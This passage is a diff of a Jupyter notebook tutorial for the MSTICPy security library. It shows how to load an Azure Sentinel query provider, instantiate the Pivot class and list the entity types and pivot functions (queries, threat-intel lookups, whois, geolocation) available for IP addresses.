+    "There are some preliminary steps needed before you can use\n",
+    "pivot functions. The main one is loading the `Pivot` class.\n",
+    "Pivot functions are added to the entities dynamically. The Pivot\n",
+    "class will try to discover relevant functions from queries, \n",
+    "Threat Intel providers and various utility functions.\n",
+    "\n",
+    "In some cases, notably data queries, the data query functions\n",
+    "are themselves created dynamically, so these need to be loaded\n",
+    "before you create the Pivot class. (You can always create a new instance\n",
+    "of this class, which forces re-discovery, so don't worry if mess up\n",
+    "the order of things).\n",
+    "\n",
+    "> Note in most cases we don't need to connect/authenticate to\n",
+    "> a data provider prior to loading *Pivot*\n",
+    "\n",
+    "Let's load our data query provider for AzureSentinel"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Please wait. Loading Kqlmagic extension...\n"
+     ]
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.reconnect();} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "az_provider = QueryProvider(\"AzureSentinel\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Now we can load and instantiate the Pivot class.\n",
+    "\n",
+    "Why do we need to pass `namespace=globals()`?\n",
+    "Pivot searches through the current objects defined in the Python/notebook\n",
+    "namespace. This is most relevant for QueryProviders. In most other cases\n",
+    "(like GeoIP and ThreatIntel providers, it will create new ones if it\n",
+    "can't find existing ones)."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n"
+     ]
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "This library uses services provided by ipstack.\n",
+       "<a href=\"https://ipstack.com\">https://ipstack.com</a>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.datamodel.pivot import Pivot\n",
+    "pivot = Pivot(namespace=globals())"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Easy discovery of functionality"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Find the entity name you need\n",
+    "\n",
+    "The simplest way to do this is simply enumerate (`dir`) the\n",
+    "contents of the *MSTPCPy* entities sub-package. This should\n",
+    "have already been imported by the `init_notebook` function that\n",
+    "we ran earlier.\n",
+    "\n",
+    "The items at the beginning of the list with proper capitalization are\n",
+    "the entities."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 10,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['Account',\n",
+       " 'Alert',\n",
+       " 'Algorithm',\n",
+       " 'AzureResource',\n",
+       " 'CloudApplication',\n",
+       " 'Dns',\n",
+       " 'ElevationToken',\n",
+       " 'Entity',\n",
+       " 'File',\n",
+       " 'FileHash',\n",
+       " 'GeoLocation',\n",
+       " 'Host',\n",
+       " 'HostLogonSession',\n",
+       " 'IpAddress',\n",
+       " 'Malware',\n",
+       " 'NetworkConnection',\n",
+       " 'OSFamily',\n",
+       " 'Process',\n",
+       " 'RegistryHive',\n",
+       " 'RegistryKey',\n",
+       " 'RegistryValue',\n",
+       " 'SecurityGroup',\n",
+       " 'Threatintelligence',\n",
+       " 'UnknownEntity',\n",
+       " 'Url',\n",
+       " '__builtins__',\n",
+       " '__cached__',\n",
+       " '__doc__',\n",
+       " '__file__',\n",
+       " '__loader__',\n",
+       " '__name__',\n",
+       " '__package__',\n",
+       " '__path__',\n",
+       " '__spec__',\n",
+       " 'account',\n",
+       " 'alert',\n",
+       " 'azure_resource',\n",
+       " 'cloud_application',\n",
+       " 'difflib',\n",
+       " 'dns',\n",
+       " 'entity',\n",
+       " 'entity_enums',\n",
+       " 'entity_graph',\n",
+       " 'file',\n",
+       " 'file_hash',\n",
+       " 'find_entity',\n",
+       " 'geo_location',\n",
+       " 'host',\n",
+       " 'host_logon_session',\n",
+       " 'ip_address',\n",
+       " 'malware',\n",
+       " 'network_connection',\n",
+       " 'process',\n",
+       " 'registry_key',\n",
+       " 'registry_value',\n",
+       " 'security_group',\n",
+       " 'threat_intelligence',\n",
+       " 'unknown_entity',\n",
+       " 'url']"
+      ]
+     },
+     "execution_count": 10,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "dir(entities)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "We're going to make this a little easier in a forthcoming\n",
+    "update with this helper function.\n",
+    "> <p style=\"color:red\"><b>Warning:</b> post-0.9.0 functionality</p>\n",
+    "> This will throw and error in v0.9.0 of MSTICPy"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Match found 'IpAddress'\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "msticpy.datamodel.entities.ip_address.IpAddress"
+      ]
+     },
+     "execution_count": 11,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "entities.find_entity(\"ip\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "No exact match found for 'azure'. \n",
+      "Closest matches are 'AzureResource', 'Url', 'Malware'\n"
+     ]
+    }
+   ],
+   "source": [
+    "entities.find_entity(\"azure\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Listing pivot functions available for an entity\n",
+    "\n",
+    "Note you can always address an entity using its qualified\n",
+    "path, e.g. `entities.IpAddress` but if you are going\n",
+    "to use one or two entities a lot it will save a bit of typing\n",
+    "if you import them explicitly.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.datamodel.entities import IpAddress, Host"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once you have the entity you can use the `get_pivot_list()`\n",
+    "function to see which pivot functions are available for it."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['AzureSentinel.SecurityAlert_list_alerts_for_ip',\n",
+       " 'AzureSentinel.SigninLogs_list_aad_signins_for_ip',\n",
+       " 'AzureSentinel.AzureActivity_list_azure_activity_for_ip',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_list_azure_network_flows_by_ip',\n",
+       " 'AzureSentinel.OfficeActivity_list_activity_for_ip',\n",
+       " 'AzureSentinel.AzureNetworkAnalytics_CL_get_host_for_ip',\n",
+       " 'AzureSentinel.Heartbeat_get_heartbeat_for_ip',\n",
+       " 'AzureSentinel.Heartbeat_get_info_by_ipaddress',\n",
+       " 'AzureSentinel.Syslog_list_logons_for_source_ip',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_ip',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_hash',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_filepath',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_domain',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_email',\n",
+       " 'AzureSentinel.ThreatIntelligenceIndicator_list_indicators_by_url',\n",
+       " 'ti.lookup_ip',\n",
+       " 'ti.lookup_ipv4',\n",
+       " 'ti.lookup_ipv4_OTX',\n",
+       " 'ti.lookup_ipv4_Tor',\n",
+       " 'ti.lookup_ipv4_VirusTotal',\n",
+       " 'ti.lookup_ipv4_XForce',\n",
+       " 'ti.lookup_ipv6',\n",
+       " 'ti.lookup_ipv6_OTX',\n",
+       " 'util.whois',\n",
+       " 'util.ip_type',\n",
+       " 'util.ip_rev_resolve',\n",
+       " 'util.geoloc',\n",
+       " 'util.geoloc_ips']"
+      ]
+     },
+     "execution_count": 14,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "IpAddress.get_pivot_list()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Some of the function names are a little unweildy but, in \n",
+    "many cases, this is necessary to avoid name collisions.\n",
+    "You might notice from the list that the functions are\n",
+    "grouped into containers \"AzureSentinel\", \"ti\" and \"util\" in \n",
+    "the above example.\n",
+    "\n",
+    "Although this makes the function name even longer we thought\n",
+    "that this helped to keep related functionality together - so\n",
+    "you don't get a TI lookup, when you thought you were running\n",
+    "a query.\n",
+    "\n",
+    "Fortunately Jupyter notebooks/IPython support tab completion\n",
+    "so you should not normally have to remember these names.\n"
+   ]
+  },
+  {
+   "attachments": {
+    "64c1580e-21f7-4ed3-af12-4f59ced1d67b.png": {
+     "image/png": "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